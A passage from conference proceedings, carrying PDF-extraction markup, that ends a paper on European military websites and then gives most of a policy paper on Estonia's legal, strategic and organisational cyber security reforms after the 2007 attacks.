class, who want strong, not to compromise the country's development, is negligible or nonexistent. The<br />
ma<strong>in</strong> difference lies precisely here. To be middle class, there must be education, which will necessarily<br />
lead to development, technology and <strong>in</strong>formation. The percentage of ignorance and <strong>in</strong>ability to use these<br />
tools, does not catalyze its development, result<strong>in</strong>g <strong>in</strong> that the analysis of several sites turned out worst <strong>in</strong><br />
these countries, as compared with other European countries.<br />
Another important and curious issue, concerns the development that has been evident <strong>in</strong> the armed<br />
forces of the countries of the former USSR. The results show that the sites <strong>in</strong> these countries,<br />
contribut<strong>in</strong>g to a holistic view of the military, because most of them have a s<strong>in</strong>gle website for all branches<br />
of the Armed Forces. Typically, this view is associated with a form of recruitment based on voluntary,<br />
contradicted, <strong>in</strong> this case, by the results found. This leads us to conclude that the armed forces of these<br />
countries are rapidly advanc<strong>in</strong>g, hav<strong>in</strong>g already surpassed the old concepts of epirocracy and<br />
thalassocracy, very common <strong>in</strong> the armed forces of the former USSR, based essentially on a system of<br />
conscription.<br />
55
Pedro Cunha et al.<br />
When classify<strong>in</strong>g countries by their <strong>in</strong>corporation method, there are smaller differences, both <strong>in</strong> the<br />
number of websites as <strong>in</strong> the results of their quality evaluation (the difference <strong>in</strong> the obta<strong>in</strong>ed average<br />
score was of only 2.08%, with advantage to those with mandatory <strong>in</strong>corporation). It is also noticeable that<br />
there was not a dim<strong>in</strong>ishment <strong>in</strong> the <strong>in</strong>vestment <strong>in</strong> the quality of the military websites <strong>in</strong> more than 50% of<br />
the countries with mandatory <strong>in</strong>corporation. This contradicts the <strong>in</strong>itial hypothesis of this work that<br />
expected countries with voluntary <strong>in</strong>corporation to have higher standards for their websites, as a mean to<br />
better reach their potential candidates.<br />
References<br />
Andreski, S. (1968) Military organization and society. University of California Press.<br />
Bailey, B. (2007) “The Army <strong>in</strong> the Marketplace: Recruit<strong>in</strong>g an All-Volunteer Force”, The Journal of American History,<br />
Vol 94, No. 1, pp 47 -74.<br />
Castells, M. (2002) The Internet galaxy: reflections on the Internet, bus<strong>in</strong>ess, and society, Oxford University Press.<br />
CIA (2011) “The World Factbook – Europe”, [onl<strong>in</strong>e], https://www.cia.gov/library/publications/the-worldfactbook/wfbExt/region_eur.html.<br />
Jehn, C., and Selden, Z. (2002) “The end of conscription <strong>in</strong> Europe?”, Contemporary Economic Policy, Vol 20, No. 2,<br />
pp 93-100.<br />
Leander, A. (2004) “Draft<strong>in</strong>g Community: Understand<strong>in</strong>g the Fate of Conscription”, Armed Forces & Society, Vol 30,<br />
No. 4, pp 571-599.<br />
Leavitt, M.O. and Shneiderman, B. (2007) Research-based web design & usability guidel<strong>in</strong>es, GSA.<br />
Mearsheimer, J.J. (1990) “Back to the Future: Instability <strong>in</strong> Europe after the Cold War”, International <strong>Security</strong>, Vol 15,<br />
No. 1, pp 5-56.<br />
Thompson, J. B. (1995) The media and modernity: a social theory of the media, Stanford University Press.<br />
Vagts, A. (1981) A History of Militarism: Civilian and Military, Greenwood Press.<br />
56
Estonia After the 2007 Cyber Attacks: Legal, Strategic and<br />
Organisational Changes <strong>in</strong> Cyber <strong>Security</strong><br />
Christian Czosseck, Ra<strong>in</strong> Ottis and Anna-Maria Talihärm<br />
Cooperative Cyber Defence Centre of Excellence, Tall<strong>in</strong>n, Estonia<br />
Christian.Czosseck@ccdcoe.org<br />
Ra<strong>in</strong>.Ottis@ccdcoe.org<br />
Anna-Maria.Talihärm@ccdcoe.org<br />
Abstract: At the time of the state-wide cyber attacks <strong>in</strong> 2007, Estonia was one of the most developed nations <strong>in</strong><br />
Europe regard<strong>in</strong>g the ubiquitous use of <strong>in</strong>formation and communication technology (ICT) <strong>in</strong> all aspects of the society.<br />
Relay<strong>in</strong>g on the Internet for conduct<strong>in</strong>g a wide range of bus<strong>in</strong>ess transactions was and still is common practice.<br />
Some of the relevant <strong>in</strong>dicators <strong>in</strong>clude: 99% of all bank<strong>in</strong>g done via electronic means, over a hundred public eservices<br />
available and the first onl<strong>in</strong>e parliamentary elections <strong>in</strong> the world. But naturally, the more a society depends<br />
on ICT, the more it becomes vulnerable to cyber attacks. Unlike other research on the Estonian <strong>in</strong>cident, this case<br />
study shall not focus on the analysis of the events themselves. Instead it looks at Estonia's cyber security policy and<br />
subsequent changes made <strong>in</strong> response to the cyber attacks hitt<strong>in</strong>g Estonia <strong>in</strong> 2007. As such, the paper provides a<br />
comprehensive overview of the strategic, legal and organisational changes based on lessons learned by Estonia<br />
after the 2007 cyber attacks. The analysis provided here<strong>in</strong> is based on a review of national security govern<strong>in</strong>g<br />
strategies, changes <strong>in</strong> the Estonia’s legal framework and organisations with direct impact on cyber security. The<br />
paper discusses six important lessons learned and manifested <strong>in</strong> actual changes: each followed by a set of cyber<br />
security policy recommendations appeal<strong>in</strong>g to national security analysts as well as nation states develop<strong>in</strong>g their own<br />
cyber security strategy.<br />
Keywords: Estonia, cyber attacks, lessons learned, strategy, legal framework, organisational changes<br />
1. Introduction<br />
Over three weeks <strong>in</strong> the spr<strong>in</strong>g of 2007, Estonia was hit by a series of politically motivated cyber attacks.<br />
Web defacements carry<strong>in</strong>g political messages targeted websites of political parties, and governmental<br />
and commercial organisations suffered from different forms of denial of service or distributed denial of<br />
service (DDoS) attacks. Among the targets were Estonian governmental agencies and services, schools,<br />
banks, Internet Service Providers (ISPs), as well as media channels and private web sites (Evron, 2008;<br />
Tikk, Kaska, & Vihul, 2010).<br />
Estonian government’s decision to move a Soviet memorial of the World War II from its previous location<br />
<strong>in</strong> central Tall<strong>in</strong>n to a military cemetery triggered street riots <strong>in</strong> Estonia, violence aga<strong>in</strong>st the Estonian<br />
Ambassador <strong>in</strong> Moscow, <strong>in</strong>direct economic sanctions by Russia, as well as a campaign of politically<br />
motivated cyber attacks aga<strong>in</strong>st Estonian (Ottis, 2008). By April 28 th the cyber attacks aga<strong>in</strong>st Estonia<br />
were officially recognized as be<strong>in</strong>g more than just random crim<strong>in</strong>al acts (Kash, 2008). The details of the<br />
weeks that followed are described <strong>in</strong> (Tikk, Kaska, & Vihul, 2010).<br />
The methods used <strong>in</strong> this <strong>in</strong>cident were not really new. However, consider<strong>in</strong>g Estonia’s small size and<br />
high reliance on <strong>in</strong>formation systems, the attacks posed a significant threat. Estonia did not consider the<br />
event as an armed attack and thus refra<strong>in</strong>ed from request<strong>in</strong>g NATO’s support under Art. 5 of the NATO<br />
Treaty; <strong>in</strong>stead, the attacks were simply regarded as <strong>in</strong>dividual cyber crimes (Nazario, 2007; Tikk, Kaska,<br />
& Vihul, 2010) or “hackitivism” as established by a well-known <strong>in</strong>formation security analyst Dorothy<br />
Denn<strong>in</strong>g (Denn<strong>in</strong>g, 2001). A further discussion on whether or not the 2007 attacks were an armed attack<br />
is beyond the scope of this paper. Many defence and security analysts have covered this particular topic<br />
and discussed e.g. the “juridical notion of <strong>in</strong>formation warfare” (Hyac<strong>in</strong>the, 2009), a “taxonomies of lethal<br />
<strong>in</strong>formation technologies” (Hyac<strong>in</strong>the & Fleurant<strong>in</strong>, 2007), formulated a “Proposal for an International<br />
Convention to Regulate the Use of Information Systems <strong>in</strong> Armed Conflict” (Brown, 2006), or “legal<br />
limitations of <strong>in</strong>formation warfare” (Ellis, 2006).<br />
The <strong>in</strong>cident quickly drew worldwide attention, and media labelled the attacks the first “Cyber War”<br />
(Landler & Markoff, 2007). This led to an overall “cyber war hype” that was cont<strong>in</strong>uously carried forward<br />
by media, researchers and policymakers. This exaggerat<strong>in</strong>g rhetoric was employed dur<strong>in</strong>g follow<strong>in</strong>g<br />
conflicts like Georgia 2008 or Kyrgyzstan 2009, and such misuse of term<strong>in</strong>ology has already received a<br />
fair amount of criticism (Farivar, 2009).<br />
57
Christian Czosseck et al.<br />
The 2007 attacks have shown that cyber attacks are not limited to s<strong>in</strong>gle <strong>in</strong>stitutions, but can evolve to a<br />
level threaten<strong>in</strong>g national security. Look<strong>in</strong>g back, the Estonian state was not seriously affected s<strong>in</strong>ce to a<br />
larger extent state functions and objects of critical <strong>in</strong>formation <strong>in</strong>frastructure were not <strong>in</strong>terrupted or<br />
disturbed (Odrats, 2007). However, nation states did receive a wake-up call on the new threats emerg<strong>in</strong>g<br />
from cyber space, alongside with new types of opponents.<br />
The follow<strong>in</strong>g three sections will provide a comprehensive overview of major changes <strong>in</strong> Estonia’s<br />
national cyber security landscape, namely the changes of national policy. As a result, several laws and<br />
regulations were <strong>in</strong>troduced, while others were amended, and there were several changes <strong>in</strong> the<br />
organisational landscape.<br />
This paper features six lessons learned that were identified as most remarkable <strong>in</strong> the case study of<br />
Estonia. It concludes with several strategic cyber security recommendations.<br />
2. Development of national strategies<br />
The benefits as well as threats of the use of Internet-related applications to <strong>in</strong>formation societies are<br />
identified by a number of Estonian high level policies and strategies.<br />
The Estonian Information Society Strategy 2013 (MoEAC, 2006), <strong>in</strong> force s<strong>in</strong>ce January 2007, promotes<br />
the broad use of ICT for the development of a knowledge-based society and economy. Given that cyber<br />
attacks on a scale match<strong>in</strong>g that of Estonia <strong>in</strong> 2007 were unseen and likely unpredicted so far, it is not<br />
surpris<strong>in</strong>g that the risk of massive cyber attacks was not taken <strong>in</strong>to serious consideration <strong>in</strong> the strategy –<br />
nor <strong>in</strong> other national policy documents from that era (see e.g. the implementation plan of the Information<br />
Society Strategy for 2007-2008, MoEAC, 2007)<br />
The National <strong>Security</strong> Concept of Estonia published <strong>in</strong> 2004 (MoD, 2004) and the government's action<br />
plan <strong>in</strong> force at this time (Estonian Government, 2007) were no exception s<strong>in</strong>ce these documents did not<br />
even mention possible cyber threats or related actions.<br />
It was only after the 2007 cyber attacks that cyber security <strong>in</strong>stantly found its way <strong>in</strong>to the national<br />
security spotlight.<br />
2.1 Policy and strategy responses s<strong>in</strong>ce 2007<br />
In July 2007, shortly follow<strong>in</strong>g the cyber attacks, the Government approved the Action Plan to Fight<br />
Cyber-attacks (Kaska, Talihärm, & Tikk, 2010). In September 2007, the revised Implementation Plan<br />
2007-2008 of the Estonian Information Society Strategy 2013 (MoEAC, 2007) was approved. The<br />
document holds a generic statement that critical <strong>in</strong>formation <strong>in</strong>frastructure should be developed <strong>in</strong> such a<br />
way that it operates smoothly <strong>in</strong> “emergency situations” (MoI 2009).<br />
2.1.1 Cyber security strategy<br />
In May 2008, the Estonian government adopted the newly drafted Cyber <strong>Security</strong> Strategy (CSS) as a<br />
comprehensive policy response to the cyber attacks. The strategy was prepared by a multi-stakeholder<br />
committee <strong>in</strong>clud<strong>in</strong>g relevant m<strong>in</strong>istries, agencies and private sector representatives.<br />
The CSS considers cyber security a national effort respond<strong>in</strong>g to the asymmetric threat posed by cyber<br />
attacks. The strategy underl<strong>in</strong>es that state-wide cyber security requires active <strong>in</strong>ternational cooperation<br />
and the promotion of global responses. On a national level, the strategy suggests implement<strong>in</strong>g<br />
organisational, technical and legal changes. Further, it aims at develop<strong>in</strong>g an over-arch<strong>in</strong>g and<br />
sophisticated cyber security culture (MoD, 2008).<br />
Based on a post-attack assessment of the situation <strong>in</strong> Estonia, the CSS identified five strategic<br />
objectives:<br />
The development and large-scale implementation of a system of security measures;<br />
Increas<strong>in</strong>g competence <strong>in</strong> cyber security;<br />
Improvement of the legal framework for support<strong>in</strong>g cyber security;<br />
Bolster<strong>in</strong>g <strong>in</strong>ternational cooperation; and<br />
Rais<strong>in</strong>g awareness on cyber security.<br />
58
Christian Czosseck et al.<br />
In May 2009, the CSS implementation plan for the 2009-2011 cycle was adopted by the government. The<br />
plan called for concrete actions <strong>in</strong> five priority areas and became the ma<strong>in</strong> source for the comprehensive<br />
cyber security approach <strong>in</strong> Estonia (Estonian Government, 2009).<br />
2.1.2 National <strong>Security</strong> Concept<br />
The National <strong>Security</strong> Concept, which was updated and approved <strong>in</strong> May 2010, represents Estonian<br />
government’s second major cyber security policy response. It recognizes Estonia’s grow<strong>in</strong>g reliance on<br />
ICT along with the <strong>in</strong>creas<strong>in</strong>g threat posed by terrorists and organised crime groups. Cyber crime should<br />
receive special attention, and solutions are to be found <strong>in</strong> co-operation between agencies on both<br />
national and <strong>in</strong>ternational level. Cyber security shall be ensured by “[...] reduc<strong>in</strong>g vulnerabilities of critical<br />
<strong>in</strong>formation systems and data communication connections”. Critical systems shall stay operational, even<br />
if the connection to foreign countries is temporarily malfunction<strong>in</strong>g or has ceased to function. To support<br />
these actions, the necessary legislation should be developed and public awareness raised (MoD, 2010).<br />
The National <strong>Security</strong> Concept led to the revised Guidel<strong>in</strong>es for Development of Crim<strong>in</strong>al Policy until<br />
2018, published <strong>in</strong> October 2010. The Police shall focus on prevent<strong>in</strong>g the spread of malware and the<br />
grow<strong>in</strong>g number of “hack<strong>in</strong>g” <strong>in</strong>cidents. Furthermore “[t]he existence of a sufficient number of IT<br />
specialists <strong>in</strong> law enforcement agencies shall be ensured <strong>in</strong> order to set bounds to cyber crime more<br />
efficiently.” (MoJ, 2010). Other strategies like the Estonian Information Society Strategy 2007-2013 have<br />
received only m<strong>in</strong>or cyber security related amendments.<br />
In addition, s<strong>in</strong>ce the 2007 attacks, Estonia has become one of the major advocates of cyber security on<br />
the <strong>in</strong>ternational level. As one result, NATO <strong>in</strong>itiated the development of a unified strategy aga<strong>in</strong>st cyber<br />
attacks (Blomfield, 2007) and <strong>in</strong> 2010 NATO adopted the new strategic concept that recognizes cyber<br />
attacks as a threat to the alliance and opts for the enhancement of alliance’s and nations’ capabilities to<br />
face the threat (NATO, 2010).<br />
Moreover, Estonia has actively supported a number of <strong>in</strong>ternational organisations such as the Council of<br />
Europe <strong>in</strong> its fight aga<strong>in</strong>st cyber crime (MoFA, 2010a), Association of Southeast Asian Nations <strong>in</strong><br />
promot<strong>in</strong>g the harmonization of laws concern<strong>in</strong>g cyber crime (MoFA, 2010b) and United Nations <strong>in</strong><br />
contribut<strong>in</strong>g an expert to the task force on Developments <strong>in</strong> Information and Communication Technology<br />
<strong>in</strong> the Context of International <strong>Security</strong> (MoFA, 2010c).<br />
3. Development <strong>in</strong> the legal field<br />
The 2007 attacks prompted major changes <strong>in</strong> the Estonian legislative landscape and <strong>in</strong> some cases<br />
enhanced the changes already underway. Legal amendments <strong>in</strong>volved several areas of law related to<br />
cyber security (see Table 1): crim<strong>in</strong>al law (<strong>in</strong>clud<strong>in</strong>g aspects of crim<strong>in</strong>al procedure) and crisis<br />
management law. The Estonian <strong>in</strong>cident did not, however, directly touch upon the legal regime applicable<br />
to armed conflicts s<strong>in</strong>ce the attacks were treated by national authorities as acts of crime.<br />
Other laws such as the Electronic Communications Act were also updated but did not <strong>in</strong>volve<br />
considerable changes <strong>in</strong> the context of cyber security (Estonian Government, 2010). Table 1.(Kaska,<br />
Talihärm, & Tikk, 2010)<br />
Table 1: Law related to cyber security<br />
Constitutional law<br />
Fundamental rights and freedoms;<br />
Organisation of the state;<br />
Execution of public authority<br />
Private law Public adm<strong>in</strong>istrative law Crim<strong>in</strong>al law<br />
Information society services<br />
eComms<br />
<strong>in</strong>frastructure provision<br />
Provision of eComms services to<br />
end users<br />
General private law support<strong>in</strong>g the<br />
function<strong>in</strong>g of <strong>in</strong>formation society<br />
(eCommerce, digital signatures)<br />
General adm<strong>in</strong>istrative procedure<br />
law support<strong>in</strong>g the accessibility of<br />
<strong>in</strong>formation society<br />
Availability of public <strong>in</strong>formation<br />
and public e-services<br />
Data process<strong>in</strong>g and data<br />
protection<br />
59<br />
Substantive<br />
crim<strong>in</strong>al law<br />
Crim<strong>in</strong>al<br />
procedure law<br />
International<br />
cooperation<br />
Crisis management<br />
law<br />
Critical <strong>in</strong>frastructure<br />
protection (CIP)<br />
Critical <strong>in</strong>formation<br />
<strong>in</strong>frastructure<br />
protection (CIIP)<br />
War-time law /<br />
national defence law<br />
National defence<br />
organisation<br />
National defence <strong>in</strong><br />
peacetime<br />
National<br />
defence <strong>in</strong><br />
conflict/wartime
3.1 Penal code<br />
Christian Czosseck et al.<br />
Mostly due to the need to harmonize the Estonian Penal Code with the Council of Europe Convention on<br />
Cyber Crime (Council of Europe, 2001) and the Council Framework Decision 2005/222/JHA of on attacks<br />
aga<strong>in</strong>st <strong>in</strong>formation systems (Council of Europe, 2005) all cyber crime related provisions <strong>in</strong> the Penal<br />
Code were reviewed. The amendments targeted the provisions address<strong>in</strong>g attacks aga<strong>in</strong>st computer<br />
systems and data, widened the scope of specific computer crime provisions (e.g. crim<strong>in</strong>aliz<strong>in</strong>g the<br />
dissem<strong>in</strong>ation of spyware and malware), added a new offence of the preparation of cyber crimes,<br />
modified the provision concern<strong>in</strong>g acts of terrorism and filled an important gap (Estonian Government, n<br />
d) <strong>in</strong> the Penal Code by enabl<strong>in</strong>g differentiation between cyber attacks aga<strong>in</strong>st critical <strong>in</strong>frastructure (with<br />
the purpose of seriously <strong>in</strong>terfer<strong>in</strong>g with or destroy<strong>in</strong>g the economic or social structure of the state) and<br />
ord<strong>in</strong>ary computer crime (MoI, 2009).<br />
3.2 Amendments relevant to crim<strong>in</strong>al procedure law<br />
The amendments <strong>in</strong> the Penal Code resulted partly from the regulatory limitations that arose <strong>in</strong> relation to<br />
the application of the Code of Crim<strong>in</strong>al Procedure (CCP) to the 2007 attacks (MoJ, 2010b) as CCP §§<br />
110-112 ma<strong>in</strong>ta<strong>in</strong> that evidence may be collected by surveillance activities <strong>in</strong> a crim<strong>in</strong>al proceed<strong>in</strong>g if the<br />
collection of evidence is a) precluded or especially complicated and b) the crim<strong>in</strong>al offence under<br />
<strong>in</strong>vestigation is, at the m<strong>in</strong>imum, an <strong>in</strong>tentionally committed crime for which the law prescribes a<br />
punishment of at least three years’ imprisonment (MoJ, 2010b). However, dur<strong>in</strong>g the Estonian attacks <strong>in</strong><br />
2007 it became apparent that almost none of the committed offences met the threshold of “three years”<br />
imprisonment and that precluded the employment of surveillance measures (Estonian Government,<br />
2007b). Therefore, the changes <strong>in</strong> the Penal Code prescribed higher maximum punishments and also<br />
corporate liability for cyber crime offences.<br />
3.3 New Emergency Act<br />
The new Emergency Act (EA) (MoI, 2009) was adopted <strong>in</strong> June 2009 and reviewed the current setup of<br />
national emergency preparedness and emergency management structure, <strong>in</strong>clud<strong>in</strong>g the responses to<br />
cyber threats.<br />
Offer<strong>in</strong>g a comprehensive approach, the act foresees a system of measures which <strong>in</strong>clude prevent<strong>in</strong>g<br />
emergencies, prepar<strong>in</strong>g for emergencies, respond<strong>in</strong>g to emergencies and mitigat<strong>in</strong>g the consequences of<br />
emergencies (“crisis management”) (MoI, n d). It is the providers of public services and <strong>in</strong>formation<br />
<strong>in</strong>frastructure owners that are tasked with everyday emergency prevention and ensur<strong>in</strong>g the stable level<br />
of service cont<strong>in</strong>uity. Providers of vital services are obliged, among other assignments, to prepare and<br />
present a cont<strong>in</strong>uous operation risk assessment (EA § 38) and an operation plan (EA § 39) to notify the<br />
citizens about events significantly disturb<strong>in</strong>g service cont<strong>in</strong>uity as well as to provide the necessary<br />
<strong>in</strong>formation to supervisory bodies. In addition to the above, there are certa<strong>in</strong> provisions that specifically<br />
address threats aga<strong>in</strong>st <strong>in</strong>formation systems, such as an obligation for the providers of vital services to<br />
guarantee the smooth application of security measures <strong>in</strong> <strong>in</strong>formation systems and <strong>in</strong>formation assets<br />
used for the provision of vital services.<br />
4. Development of organisations<br />
Before the 2007 cyber attacks Estonia had relatively few organisations dedicated to (national) cyber<br />
defence. S<strong>in</strong>ce then, Estonia has made some key organisational changes to better deal with the cyber<br />
threats. The most significant ones are described below.<br />
A high level organisational change was the formation of the Cyber <strong>Security</strong> Council under the<br />
Government <strong>Security</strong> Committee, a body foreseen by the National Cyber <strong>Security</strong> Strategy. The Council<br />
reports directly to the Government <strong>Security</strong> Committee and is therefore well-placed for coord<strong>in</strong>at<strong>in</strong>g <strong>in</strong>teragency<br />
and <strong>in</strong>ternational cyber <strong>in</strong>cident response.<br />
4.1 EIC, CERT-EE and CIIP<br />
Estonian Informatics Centre (EIC) is a state agency that is responsible for manag<strong>in</strong>g and develop<strong>in</strong>g<br />
public <strong>in</strong>formation services and systems (MoEAC, 2009). It is also tasked with provid<strong>in</strong>g cyber security for<br />
these services and systems. Even though a national CERT had been established <strong>in</strong> 2006 as a<br />
department of the EIC, its capabilities and experience were still quite modest at the time of the attacks. In<br />
2009, as a result of the National Cyber <strong>Security</strong> Strategy, the Department of Critical Information<br />
60
Christian Czosseck et al.<br />
Infrastructure Protection (CIIP) was added to the structure of EIC, <strong>in</strong> addition to the already exist<strong>in</strong>g<br />
CERT. The ma<strong>in</strong> tasks of the new department <strong>in</strong>clude supervis<strong>in</strong>g risk analyses of critical <strong>in</strong>formation<br />
<strong>in</strong>frastructures and develop<strong>in</strong>g protective measures.<br />
4.2 Cyber defence league<br />
Dur<strong>in</strong>g the cyber attack campaign, the Estonian CERT was assisted by an <strong>in</strong>formal network of volunteer<br />
cyber security experts. This provided much needed additional capabilities, such as <strong>in</strong>creased situational<br />
awareness, analysis capability, quick shar<strong>in</strong>g of defensive techniques between targeted entities, as well<br />
as an extended network of direct contacts to <strong>in</strong>ternational partners.<br />
The roots of this <strong>in</strong>formal group derive from the late 1990ies, when Estonia was adopt<strong>in</strong>g a national ID<br />
card system. Over the years, the network of professionals had also cooperated aga<strong>in</strong>st crim<strong>in</strong>ally<br />
motivated cyber attacks target<strong>in</strong>g critical <strong>in</strong>frastructures (e.g., Estonian banks). A later development was<br />
the formalisation of this loose cooperation <strong>in</strong>to the Cyber Defence League (CDL) <strong>in</strong> 2009. The Defence<br />
League is a volunteer national defence organization <strong>in</strong> the military cha<strong>in</strong> of command. The CDL is part of<br />
the Defence League and unites cyber security specialists who are will<strong>in</strong>g to contribute their time and skills<br />
for the protection of the high-tech way of life <strong>in</strong> Estonia, especially assist<strong>in</strong>g the defence of critical<br />
<strong>in</strong>formation <strong>in</strong>frastructure. It is important to note that this is a defensive organisation, not designed to<br />
harass political adversaries <strong>in</strong> (anonymous) cyber attack campaigns. In January 2011, the CDL was<br />
reorganized <strong>in</strong>to the Cyber Defence Unit of the Defence League, but the CDL name is still widely used.<br />
CDL’s key activities <strong>in</strong>clude organiz<strong>in</strong>g tra<strong>in</strong><strong>in</strong>g and awareness events, as well as cyber defence<br />
exercises. In 2010, the CDL was <strong>in</strong>volved with the Baltic Cyber Shield exercise organised by Cooperative<br />
Cyber Defence Centre of Excellence (Geers, 2010), the US-led International Cyber Defence Workshop,<br />
as well as a series of national exercises. The CDL is a good example of manag<strong>in</strong>g <strong>in</strong> a productive<br />
manner the expertise and enthusiasm of motivated cyber security specialists.<br />
5. Six recommendations<br />
Given that the major changes have been discussed above, the next section will feature six significant<br />
lessons learned from the 2007 cyber attacks aga<strong>in</strong>st Estonia:<br />
5.1 Comprehensive strategy approach<br />
It is evident that Estonia has taken <strong>in</strong>to account the lessons learned from the 2007 <strong>in</strong>cident, the most<br />
significant step be<strong>in</strong>g the quick establishment of a comprehensive policy response which has led to the<br />
adoption and subsequent implementation of the national Cyber <strong>Security</strong> Strategy. The Estonian example<br />
emphasises the need for nation-wide cooperation and countermeasures aga<strong>in</strong>st cyber crime, <strong>in</strong>volv<strong>in</strong>g<br />
major stakeholders of the public and private sector.<br />
It rema<strong>in</strong>s to be debated whether cyber security should be handled <strong>in</strong> a s<strong>in</strong>gle comprehensive strategy or<br />
form a sub-section of all other relevant strategies touch<strong>in</strong>g upon ICT. However, consider<strong>in</strong>g the speed of<br />
technological advancements and compar<strong>in</strong>g it with the speed of develop<strong>in</strong>g national strategies, the<br />
Estonian approach of hav<strong>in</strong>g a s<strong>in</strong>gle strategy might be the one more advisable.<br />
The 2007 attacks triggered the cyber security strategy draft<strong>in</strong>g <strong>in</strong> Estonia. However, countries should not<br />
wait for such triggers and should pro-actively conduct a thorough and comprehensive risk assessment of<br />
their cyber <strong>in</strong>frastructure. Furthermore, often only the context and additional <strong>in</strong>formation will reveal if the<br />
attack was launched with crime, espionage, terrorism or military motivation. Therefore, close cooperation<br />
between relevant agencies rema<strong>in</strong>s a s<strong>in</strong>e qua non to success <strong>in</strong> this arena.<br />
5.2 Politically motivated cyber attacks<br />
Another aspect to consider is the shift of attention <strong>in</strong> terms of cyber security threats over the last decade.<br />
While the first half of the decade the cyber security focus was on crim<strong>in</strong>al and espionage attacks (if<br />
recognised as a national security issue at all), the second half witnessed a surge <strong>in</strong> politically motivated<br />
cyber attacks (Nazario, 2009). The significance of this development is that targets have transformed. A<br />
politically motivated attacker is likely to attack visible and politically significant targets (such as the public<br />
website of a government agency or a company that has angered an <strong>in</strong>terest group), which are of little<br />
<strong>in</strong>terest to crim<strong>in</strong>als and <strong>in</strong>telligence agencies. This shift <strong>in</strong> targets requires everyone to reassess their<br />
risks and security requirements.<br />
61
Christian Czosseck et al.<br />
Politically motivated actors can cover the entire spectrum of cyber attack, from high-profile strikes aga<strong>in</strong>st<br />
critical <strong>in</strong>frastructure, to millions of p<strong>in</strong>prick attacks that can weaken the state over a long period of time<br />
(Lemay, Fernandeza, & Knight, 2010; Liles, 2010; Ottis, 2009). As the threat of politically motivated<br />
attacks threaten<strong>in</strong>g national security is not likely to go away <strong>in</strong> the foreseeable future, it must be<br />
addressed as a national security issue <strong>in</strong> order to get the full attention of policymakers.<br />
5.3 Legal recommendations<br />
An analysis of the Estonian legal order govern<strong>in</strong>g the doma<strong>in</strong> of <strong>in</strong>formation society underl<strong>in</strong>es that a<br />
secure <strong>in</strong>formation society needs to be comprehensively supported by norms <strong>in</strong>volv<strong>in</strong>g several legal<br />
discipl<strong>in</strong>es. The broad approach illustrated by the Estonian legal framework br<strong>in</strong>gs together the areas of<br />
private and public law, and completes the spectrum of cyber <strong>in</strong>cident regulation by engag<strong>in</strong>g crim<strong>in</strong>al law,<br />
crisis management regulation and wartime law/national defence legal order. It is vital for countries to<br />
realize that the <strong>in</strong>ternational cyber security regulation <strong>in</strong>volves a wide range of legal areas and the review<br />
of relevant regulatory frameworks and the identification of possible uncovered “grey areas” is highly<br />
recommended.<br />
With<strong>in</strong> national legal systems, a review of crim<strong>in</strong>al law (penal law) appears to be a central issue. Attacks<br />
aga<strong>in</strong>st critical (<strong>in</strong>formation) <strong>in</strong>frastructure, politically motivated cyber attacks, possible cases of cyber<br />
terrorism, as well as related provisions for <strong>in</strong>vestigation and prosecution, should all be reflected <strong>in</strong> the<br />
domestic crim<strong>in</strong>al law or other national acts. Broad and <strong>in</strong>clusive national implementation of the Council<br />
of Europe Convention on Cybercrime is of crucial importance, especially consider<strong>in</strong>g the cross-border<br />
nature of cyber crime.<br />
Additionally, the Estonian experience underl<strong>in</strong>ed the need to establish common security standards for all<br />
computer users, <strong>in</strong>formation systems and critical <strong>in</strong>frastructure companies (MoD, 2008). By 2011, steps<br />
have been taken to establish such standards for service providers with<strong>in</strong> the framework of the Electronic<br />
Communications Act, but more detailed rules for end-users’ conduct and/or legal obligations are still<br />
needed.<br />
5.4 Exercises and education for the masses<br />
A key component of enhanc<strong>in</strong>g (national) cyber security is cyber security awareness and education. This<br />
should not be limited to professionals <strong>in</strong> governmental or private <strong>in</strong>stitutions, but must cover the whole<br />
spectrum from a citizen us<strong>in</strong>g ICT for everyday th<strong>in</strong>gs to senior policy makers, consider<strong>in</strong>g the skills and<br />
knowledge needed at every level. This <strong>in</strong>cludes law enforcement agencies and especially the judicial<br />
system that has a central role <strong>in</strong> <strong>in</strong>terpret<strong>in</strong>g the regulatory aspects of cyber security. By develop<strong>in</strong>g<br />
different solutions well suited for each groups, a broad and sophisticated cyber security culture can be<br />
implemented, as aimed for <strong>in</strong> the CSS.<br />
Estonia recognized its lack of sufficient number of well-tra<strong>in</strong>ed <strong>in</strong>formation security experts and<br />
developed a new Master’s program for Cyber <strong>Security</strong> Studies <strong>in</strong> 2008. The Cyber Defence League is<br />
another venue for actively tra<strong>in</strong><strong>in</strong>g experts <strong>in</strong> cyber security. Further measures, such as <strong>in</strong>formation<br />
campaigns for the secure use of the Internet, special classes <strong>in</strong> high school or vocational tra<strong>in</strong><strong>in</strong>g should<br />
be considered by Estonia and other nation states.<br />
Additionally, cyber security exercises organised both on national and <strong>in</strong>ternational level serve as effective<br />
preparation to respond to cyber attacks. Exercises like Cyber Europe 2010 (ENISA, 2010) require<br />
efficient coord<strong>in</strong>ation between agencies and private shareholders and should be regularly conducted.<br />
5.5 International relations<br />
The attacks aga<strong>in</strong>st Estonia <strong>in</strong> 2007 underl<strong>in</strong>ed the importance of <strong>in</strong>ternational cooperation as it became<br />
even more apparent that <strong>in</strong> the context of respond<strong>in</strong>g to cyber threats, one country can do little alone. To<br />
that end, active participation <strong>in</strong> the work of major organizations deal<strong>in</strong>g with cyber security requires<br />
keep<strong>in</strong>g national developments and legal framework up to date and serves as a useful ground for new<br />
<strong>in</strong>itiatives, further collaboration and regional or global forum. Moreover, the ratification of <strong>in</strong>struments<br />
such as the Council of Europe Convention of Cyber Crime that aim to harmonise cyber crime regulation<br />
worldwide should be supported and promoted.<br />
62
Christian Czosseck et al.<br />
Beside the political will for cooperation, national multi- and bilateral agreements, <strong>in</strong>formation shar<strong>in</strong>g<br />
agreements, cooperation of law enforcement agencies, jo<strong>in</strong>t <strong>in</strong>vestigation teams, <strong>in</strong>ternational exercises,<br />
formal and <strong>in</strong>formal networks and other <strong>in</strong>ternational <strong>in</strong>itiatives are vital for effective prosecution and<br />
<strong>in</strong>vestigation of cyber crime offences.<br />
5.6 Harness<strong>in</strong>g the volunteers<br />
It is well known that most of the Internet <strong>in</strong>frastructure is owned and operated by the private sector. It<br />
follows that there is a pool of experts <strong>in</strong> the private sector, who could provide a mean<strong>in</strong>gful contribution to<br />
national cyber security, regardless of their actual position <strong>in</strong> the private sector. This also <strong>in</strong>cludes experts<br />
<strong>in</strong> the public sector, who do not work <strong>in</strong> their area of expertise. Clearly, there are limits to the use of<br />
